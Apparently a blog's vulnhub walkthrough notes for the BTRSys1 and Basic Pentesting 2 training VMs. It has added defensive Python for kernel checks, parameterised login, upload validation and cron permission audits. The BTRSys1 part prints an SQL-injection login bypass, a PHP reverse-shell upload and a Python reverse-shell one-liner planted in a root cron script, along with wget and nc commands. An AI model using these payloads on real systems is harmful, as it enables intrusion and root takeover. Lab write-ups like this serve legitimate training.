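The "uname -a" line above and the searchsploit title "< 4.4.0-116" are enough to decide whether this host is behind the fixed build, which is the check a patch-compliance script makes on a fleet. This is an added example, not code from the write-up: the only version data it uses is the uname line captured above and the 4.4.0-116 boundary from the searchsploit title; the second advisory in the dictionary is a constructed placeholder to show a non-match. The point it demonstrates is that the Ubuntu ABI number after the dash (62 vs 116) is what separates patched from unpatched builds of the same upstream 4.4.0, and that it has to be compared numerically, not as a string.

```python
"""Compare a running Ubuntu kernel against the version an advisory names as fixed.

Added example, not code from the write-up. Version data: the uname line
captured on the VM and the "< 4.4.0-116" boundary from the searchsploit
title; the second advisory below is a constructed placeholder.
"""
import re

# "4.4.0-62-generic" -> major.minor.patch-abi; the ABI number is optional so
# that plain upstream versions such as "4.4.0" still parse.
_KVER = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def kernel_tuple(version):
    """Parse 'X.Y.Z-N...' into a comparable (X, Y, Z, N) tuple; N defaults to 0."""
    m = _KVER.search(version)
    if not m:
        raise ValueError("no kernel version in %r" % version)
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch), int(abi or 0))


def kernel_from_uname(uname_line):
    """Pull the release field (third whitespace-separated token) out of 'uname -a' output."""
    fields = uname_line.split()
    if len(fields) < 3:
        raise ValueError("unexpected uname output: %r" % uname_line)
    return fields[2]


def kernel_older_than(running, fixed):
    """True when the running kernel predates the first fixed build.
    Tuple comparison is numeric, so 62 < 116 even though "62" > "116" as strings."""
    return kernel_tuple(running) < kernel_tuple(fixed)


def check_host(uname_line, fixed_versions):
    """Return the names of advisories whose fixed build is newer than the running kernel."""
    running = kernel_from_uname(uname_line)
    return [name for name, fixed in fixed_versions.items() if kernel_older_than(running, fixed)]


# the line captured on the VM above
UNAME_FROM_PAGE = ("Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 "
                   "x86_64 x86_64 x86_64 GNU/Linux")

# advisory label -> first fixed kernel build
ADVISORIES = {
    "exploitdb 44298 (fixed in 4.4.0-116)": "4.4.0-116",   # from the searchsploit title above
    "constructed placeholder (fixed in 4.4.0-50)": "4.4.0-50",  # made up, shows a non-match
}

if __name__ == "__main__":
    for name in check_host(UNAME_FROM_PAGE, ADVISORIES):
        print("behind fixed build:", name)
```

Feeding the same function the uname output of each host in an inventory gives the list of machines that still need the kernel update, which is the defender's side of the searchsploit lookup above.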

Wrap-up

  • "404.php" was here: "/wordpress/wp-content/themes/twentyfourteen/404.php"
  • If I had looked for gcc with "locate gcc", could I have compiled locally?
  • What was the ".bash_history" in "/var/www" about?

vulnhub BTRSys1 notes

BTRSys1

Service enumeration

# nmap -p- 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.12
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT
Nmap scan report for 10.10.10.12
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds

Points of interest

Details

[port 21] ftp vsftpd 3.0.2

# searchsploit vsftp
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                                                                                       | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                                                                                       | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                                                                                       | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                                                                                                                                     | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                                                                               | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

vsftpd is unlikely to be much use going forward either.

[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)

OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                                                                                                         | exploits/linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                                                                                                               | exploits/linux/remote/45001.py

Looked promising, but there is no SFTP, and I don't know any SSH users.

[port 80] http Apache httpd 2.4.7 (Ubuntu)

# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.12
+ Target Hostname:    10.10.10.12
+ Target Port:        80
+ Start Time:         2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.12

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat May  9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/                                                                            
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)                                                                   
==> DIRECTORY: http://10.10.10.12/javascript/                                                                        
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)                                                               
==> DIRECTORY: http://10.10.10.12/uploads/                                                                           
                                                                                                                     
---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)                                                 
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)                                                     
                                                                                                                     
-----------------
END_TIME: Sat May  9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4

Nothing much in Apache/PHP itself.
There are various directories but nothing notable,
though "/uploads/" looks suspicious any way you cut it.
config.php can't be read by simply requesting it.
login.php doesn't look like it will pass with random input.
However,

# curl 10.10.10.12/login.php
(snip)
 <div class="login-box">
    <div class="lb-header">
      <a href="#" class="active" id="login-box-link">Giris Yap</a>
    </div>
   <form method="Post" name="loginform" action="personel.php" class="email-login">
      <div class="u-form-group">
        <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/> 
      </div>
      <div class="u-form-group">
        <input type="password" id="pwd" name="parola" placeholder="Parola" required/>
      </div>
      <div class="u-form-group">
        <input type="button" value="Giris" onclick="control();" />
      </div>
   
    </form>
  </div>
  
  <script type="text/javascript">
    
function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    var str=user.substring(user.lastIndexOf("@")+1,user.length);
    
    if((pwd == "'")){
        alert("Hack Denemesi !!!");
        
    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");
    
    }   
    else{
        
      document.loginform.submit();
    }
}
</script>

A password containing a single quote is rejected,
and the e-mail address is not accepted unless it contains "@btrisk.com".
If those two conditions are satisfied, it looks like any value logs you in?
The page it goes to is

# curl 10.10.10.12/personel.php
(snip)
        <script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        document.myform.submit();
    }else{
        //mesaj
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
        return false;
        
        
    }
}
</script>

Is there a file upload script?
I can't find the button or anything else that triggers the script.
Back to login.php again.
After trying various logins, a single quote can be used as long as it comes before "@btrisk.com".
Putting "' or '1'='1'-- @btrisk.com" in the e-mail address appears to get SQLi through.
Once the SQLi landed I was logged in and found the getFile() button.
The reverse-shell PHP is the usual pentestmonkey one, "/usr/share/webshells/php/php-reverse-shell.php".
Trying to upload the reverse-shell PHP file gets refused because it isn't "jpg,gif,png".
But the decision that it must be an image file is made by JavaScript on the client side, not on the server, so it can be bypassed by tampering with getFile() from the browser console.
In my case, after selecting the file in the file picker, I ran "document.myform.submit();" from the browser console and it uploaded.
Now, where do uploaded files end up?
Naturally, in "/uploads/".
And sure enough, checking after the upload, the file is there.
shell getchu!

window 1

# nc -nlvp 443
window 2

# curl 10.10.10.12/uploads/reverse.php
window 1


Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 19:00:23 up 11:28,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Also, "/javascript/" was "Forbidden", yet "/javascript/jquery/jquery" and "/javascript/jquery/version" return 200 for some reason.
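Both weaknesses used above, the login form whose only quote check runs in the browser and the upload form whose only extension check runs in the browser, have the same root cause: nothing is verified server-side. The block below is an added example (not code from the VM or this write-up) showing what the server-side counterparts look like. It uses an in-memory sqlite3 table as a stand-in for the VM's MySQL "deneme.user" table; the column names, the two sample users, the hashed passwords and the magic-byte allowlist are constructed here.

```python
"""Server-side counterparts to the client-side-only checks in login.php / personel.php.

Added example, not code from the VM or this write-up. An in-memory sqlite3
table stands in for the VM's MySQL 'deneme.user' table; the users, the
hashed passwords and the magic-byte allowlist are constructed here.
"""
import hashlib
import hmac
import os
import sqlite3

# extension -> magic bytes a genuine file of that type starts with (constructed allowlist)
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
PBKDF2_ROUNDS = 100_000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256. The table on the VM stored 'asd123***' in clear,
    which is what made the later 'su -' possible."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def build_demo_db():
    """Constructed stand-in for deneme.user with hashed instead of plaintext passwords."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, kullanici_adi TEXT UNIQUE, "
        "salt BLOB NOT NULL, parola_hash BLOB NOT NULL)"
    )
    for uid, email, pw in [(1, "ikaya@btrisk.com", "asd123***"), (2, "cdmir@btrisk.com", "asd123***")]:
        salt, digest = hash_password(pw)
        con.execute("INSERT INTO user VALUES (?, ?, ?, ?)", (uid, email, salt, digest))
    con.commit()
    return con


def login(con, email, password):
    """Server-side login. The '?' placeholder binds the e-mail as data, so a quote in it
    is just a character, never SQL; the domain rule is enforced here, not in the browser."""
    if not email.lower().endswith("@btrisk.com"):
        return False
    row = con.execute(
        "SELECT salt, parola_hash FROM user WHERE kullanici_adi = ?", (email,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)


def validate_upload(filename, body):
    """Server-side upload check: allowlisted extension AND the body's magic bytes must agree.
    Repeating the browser's extension test on the server is necessary but not sufficient."""
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1].lower()
    magics = ALLOWED_IMAGE_TYPES.get(ext)
    if magics is None:
        return False
    return any(body.startswith(m) for m in magics)


if __name__ == "__main__":
    db = build_demo_db()
    print("real user:", login(db, "ikaya@btrisk.com", "asd123***"))
    print("php as png:", validate_upload("reverse.png", b"<?php"))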

after shell getchu

Using credentials found in the SQL database

First, go and look at the "config.php" that couldn't be read earlier.

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
ls
assets      gonder.php      index.php  personel.php  uploads
config.php  hakkimizda.php  login.php  sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
  {
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
  }
/////////////////////////////////////////////////////////////////////////////////////////
?>

www-data@BTRsys1:/var/www/html$ 

Could this be root privilege escalation via MySQL running as root?

www-data@BTRsys1:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select sys_exec("id");
select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist

That wasn't the case, so look around.

mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use information_schema;
use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql> select * from user;
select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)

mysql> 

This looks like information that could be put to various uses?

www-data@BTRsys1:/var/www/html$ su -
su -
Password: asd123***

root@BTRsys1:~# id
id
uid=0(root) gid=0(root) groups=0(root)

root shell getchu!!

Looking at cron

I came across an interesting command, "find / -perm -2 -type f 2>/dev/null", so let's try it right away.

www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type f 2>/dev/null
/var/tmp/cleaner.py.swp
/var/log/cronlog
(snip)
/lib/log/cleaner.py

Most of the results don't matter, but two interesting things turned up.
What on earth are "/var/log/cronlog" and "/lib/log/cleaner.py"?

www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog    
cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
ls -al /lib/log/ | grep cleaner
-rwxrwxrwx  1 root root   96 Aug 13  2014 cleaner.py

Rewriting "cleaner.py" gets root.
This time I replace it with the following.

#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

"LHOST" and "LPORT" as you like.

attacker

# python -m SimpleHTTPServer 80
victim

www-data@BTRsys1:/var/www/html$ cd /lib/log
cd /lib/log
www-data@BTRsys1:/lib/log$ cd /tmp                   
cd /tmp
www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-09 20:03:17--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: 'getroot.py'

100%[======================================>] 238         --.-K/s   in 0s      

2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238]

www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py
cp ./getroot.py /lib/log/cleaner.py
www-data@BTRsys1:/tmp$ 
attacker
(waiting for cron)
# nc -nlvp 8080
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.12.
Ncat: Connection from 10.10.10.12:56889.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

Under "/tmp", with bad timing cleaner.py may delete your files, so it might be better to work in "/var/www/html/uploads".
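The whole chain above rests on one misconfiguration: a script executed by root's cron is mode 0777, so anyone on the box can replace its contents. The author's "find / -perm -2 -type f" finds such files from the attacker's side; the block below is the same check from the administrator's side, as an added example that is not part of the original write-up. It parses a user-crontab of the form seen in "/var/log/cronlog", resolves each command to a file, and reports scripts that are writable by group/other, not owned by the job's user, or sitting in a world-writable directory. The crontab text and the file layout built by demo() are constructed to mirror the page.

```python
"""Audit crontab entries for scripts a non-root user could modify.

Added example, not part of the original write-up. It rebuilds the situation
above (a root cron job running a mode-0777 cleaner.py) inside a temporary
directory, then flags entries whose script is writable by group/other,
whose owner is not the job's user, or whose directory is world-writable.
The crontab text and file layout used by demo() are constructed.
"""
import os
import stat
import tempfile

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week, then the command


def cron_command(line):
    """Return the command part of a user-crontab line ('' for blank, comment or VAR= lines)."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
        return ""
    parts = line.split(None, CRON_FIELDS)
    return parts[CRON_FIELDS] if len(parts) > CRON_FIELDS else ""


def resolve_program(command, search_dirs):
    """Map the first word of the command to a file, the way cron's PATH lookup would."""
    prog = command.split()[0]
    if os.path.isabs(prog):
        return prog
    for d in search_dirs:
        candidate = os.path.join(d, prog)
        if os.path.isfile(candidate):
            return candidate
    return prog  # unresolved; reported as missing by weak_permissions()


def weak_permissions(path, expected_uid):
    """List the reasons someone other than the job's user could alter what this job runs."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["not found on the search path"]
    reasons = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("script writable by group/other (mode %04o)" % stat.S_IMODE(st.st_mode))
    if st.st_uid != expected_uid:
        reasons.append("script owned by uid %d, not the job's uid %d" % (st.st_uid, expected_uid))
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("directory world-writable without sticky bit")
    return reasons


def audit_crontab(text, search_dirs, expected_uid=0):
    """Return [(script path, reasons)] for every job whose script fails weak_permissions()."""
    findings = []
    for line in text.splitlines():
        cmd = cron_command(line)
        if not cmd:
            continue
        path = resolve_program(cmd, search_dirs)
        reasons = weak_permissions(path, expected_uid)
        if reasons:
            findings.append((path, reasons))
    return findings


def demo():
    """Recreate the page's layout in a temp dir: a 0777 cleaner.py plus a correctly
    locked-down sibling, both referenced from a crontab like /var/log/cronlog."""
    base = tempfile.mkdtemp()
    libdir = os.path.join(base, "lib", "log")
    os.makedirs(libdir)
    os.chmod(libdir, 0o755)
    bad = os.path.join(libdir, "cleaner.py")
    good = os.path.join(libdir, "rotate.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = "*/2 * * * * cleaner.py\n0 3 * * * rotate.sh\n# comment\n"
    # the demo files are owned by us, so our uid plays the role root plays on the VM
    return audit_crontab(crontab, [libdir], expected_uid=os.getuid())


if __name__ == "__main__":
    for path, reasons in demo():
        print(path, "->", "; ".join(reasons))
```

On a real host you would feed it root's crontab ("crontab -l -u root") and the entries of /etc/cron.d, with search_dirs set to the PATH cron actually uses; the fix for anything it reports is the one the VM needed, a script owned by root with mode 0755 or tighter. The owner check matters as much as the mode bits: a 0644 script owned by www-data is just as replaceable as a 0777 one.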

Lessons

  • Isn't "find / -perm -2 -type f 2>/dev/null" great!?

vulnhub Basic Pentesting 2 notes

Basic pentesting 2

Extracting the archive produced an ova file, but just importing the ova didn't bring the link up on the internal network.
This applies to the setup described here:

rootreasure.hatenablog.jp

Selecting "recovery mode" at boot and then "network Enable networking" brought the link up.
If you power-cycle the VM, this needs to be made automatic.

Service enumeration

# nmap -Pn -p- 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00011s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds
# nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT
Nmap scan report for 10.10.10.11
Host is up (0.00081s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC)
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds

Points of interest

This time it's a spring Apache festival, is it.

Details

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

I recall at some point finding there was nothing for this but "Username Enumeration".
Brute-force attacks aren't smart, so no.

[port 80] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.11
+ Target Hostname:    10.10.10.11
+ Target Port:        80
+ Start Time:         2020-05-04 23:48:50 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 23:49:15 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.11

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May  4 23:49:46 2020
URL_BASE: http://10.10.10.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.11/ ----
==> DIRECTORY: http://10.10.10.11/development/                                                                       
+ http://10.10.10.11/index.html (CODE:200|SIZE:158)                                                                  
+ http://10.10.10.11/server-status (CODE:403|SIZE:299)                                                               
                                                                                                                     
---- Entering directory: http://10.10.10.11/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon May  4 23:49:50 2020
DOWNLOADED: 4612 - FOUND: 2
# dirb http://10.10.10.11/development/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May  4 23:50:03 2020
URL_BASE: http://10.10.10.11/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.11/development/ ----
                                                                                                                     
-----------------
END_TIME: Mon May  4 23:50:07 2020
DOWNLOADED: 4612 - FOUND: 0

"/development" is suspicious.

# curl http://10.10.10.11
<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

Found "dev.txt" and "j.txt" in "/development/".

# curl http://10.10.10.11/development/dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J
# curl http://10.10.10.11/development/j.txt
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Apache Struts?

Does "struts" mean "Apache Struts"?
If so, it looks like they are running "Apache Struts 2.5.12".

# searchsploit apache
(snip)
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution       | exploits/linux/remote/42627.py

Found exploit code, but I don't know the target, so putting it on hold.

# -*- coding: utf-8 -*-
# pip install requests

According to K, J's password hash is weak?

I sensed a hint of directory traversal to /etc/shadow, but couldn't figure it out.

[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

# smbclient -L 10.10.10.11
Enter WORKGROUP\root's password: 

